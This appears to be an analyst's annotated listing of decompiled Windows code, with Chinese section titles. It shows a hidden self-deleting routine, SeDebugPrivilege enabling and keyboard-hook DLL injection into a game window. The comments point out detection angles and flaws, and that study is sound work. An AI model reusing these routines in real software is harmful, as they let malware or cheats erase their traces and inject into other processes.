1. 运行后删除自身:
// Self-delete routine (decompiled). Builds "cmd.exe /c del <own image path>",
// launches it hidden, then terminates the current process via sub_403739 so
// the image file is no longer locked and the delete can complete.
// Detection angle: a cmd.exe child whose command line deletes the parent's
// own image path, immediately followed by the parent exiting, is a
// well-known self-removal pattern worth alerting on.
// PathName is a global buffer defined outside this listing.
BOOL __cdecl sub_403754()
{
CHAR CmdLine; // [sp+4h] [bp-400h]@1 -- decompiler artifact: the frame offset suggests a ~0x400-byte stack buffer, not a single CHAR; presumably used as that buffer below
GetModuleFileNameA(0, PathName, 0x104u); // own executable path, up to MAX_PATH (0x104) bytes, into the global PathName
wsprintfA(&CmdLine, "cmd.exe /c del \"%s\" ", PathName); // unbounded format into the stack buffer; the path length is capped by the 0x104 above
WinExec(&CmdLine, 0); // nCmdShow 0 == SW_HIDE: no visible console window
return sub_403739(); // kill self so the pending del is not blocked by the running image
}
// Terminates the current process through an explicitly opened handle
// (OpenProcess with access mask 1 == PROCESS_TERMINATE) instead of calling
// ExitProcess. Returns TerminateProcess's BOOL. The handle in v1 is never
// closed; on success that is moot because the process is gone.
BOOL __cdecl sub_403739()
{
DWORD v0; // eax@1
HANDLE v1; // eax@1
v0 = GetCurrentProcessId();
v1 = OpenProcess(1u, 0, v0); // 1u == PROCESS_TERMINATE, bInheritHandle FALSE; result unchecked, a NULL handle would just make TerminateProcess fail and return FALSE
return TerminateProcess(v1, 0); // exit code 0
}
2. 提权
// Enables SeDebugPrivilege on the current process token, the usual
// prerequisite for opening other (including protected) processes with
// full access. On a token that does not hold the privilege this silently
// does nothing: AdjustTokenPrivileges still returns TRUE and only reports
// ERROR_NOT_ALL_ASSIGNED via GetLastError, and neither is examined here.
// Detection angle: enabling SeDebugPrivilege on a token is auditable as
// Security event 4703 ("A user right was adjusted") when that audit
// subcategory is on, and is rare for ordinary user-mode software.
void AdjustPrivilege()
{
HANDLE hToken;
if (OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &hToken)) // only the adjust right is requested; no TOKEN_QUERY
{
TOKEN_PRIVILEGES tp;
tp.PrivilegeCount = 1;
tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
if (LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &tp.Privileges[0].Luid)) // resolve "SeDebugPrivilege" to its LUID on the local system
{
AdjustTokenPrivileges(hToken, FALSE, &tp, sizeof(tp), NULL, NULL); // FALSE: leave other privileges untouched; no previous-state buffer; return value and GetLastError ignored
}
CloseHandle(hToken);
}
}
3. XX隐藏自身的几个hook
4. 根据窗口实施钩子注入
// Decompiled fragment: locate the target game window by title, resolve the
// thread that owns it, and install a WH_KEYBOARD (2) hook whose procedure
// lives in gamedll.dll, which causes that DLL to be loaded into the owning
// process. The window title is masked ("*****") in this listing and its
// closing quote is a full-width “ -- a transcription artifact, not the
// original code. v1..v3 and fn are declared outside this fragment.
v1 = FindWindowA(0, "*****“); // class NULL, title "*****" (masked); v1 is the target HWND or NULL
if ( !v1 )
Messagebox("未找到游戏", 0, 0); // text "game not found"; "Messagebox" (sic) is presumably a wrapper around MessageBoxA; note there is no return on this path, execution falls through with v1 == NULL
v2 = GetWindowThreadProcessId(v1, 0); // owning thread id; NOTE(review): per the Win32 docs an invalid HWND yields 0, and a 0 dwThreadId below would scope the hook to every thread on the desktop rather than one process -- confirm against the full function
v3 = GetModuleHandleA("gamedll.dll"); // hMod must be the module containing fn; the DLL is expected to be already loaded in this process (result unchecked)
SetWindowsHookExA(2, fn, v3, v2); // idHook 2 == WH_KEYBOARD; hook procedure fn is defined elsewhere; return value (HHOOK) is discarded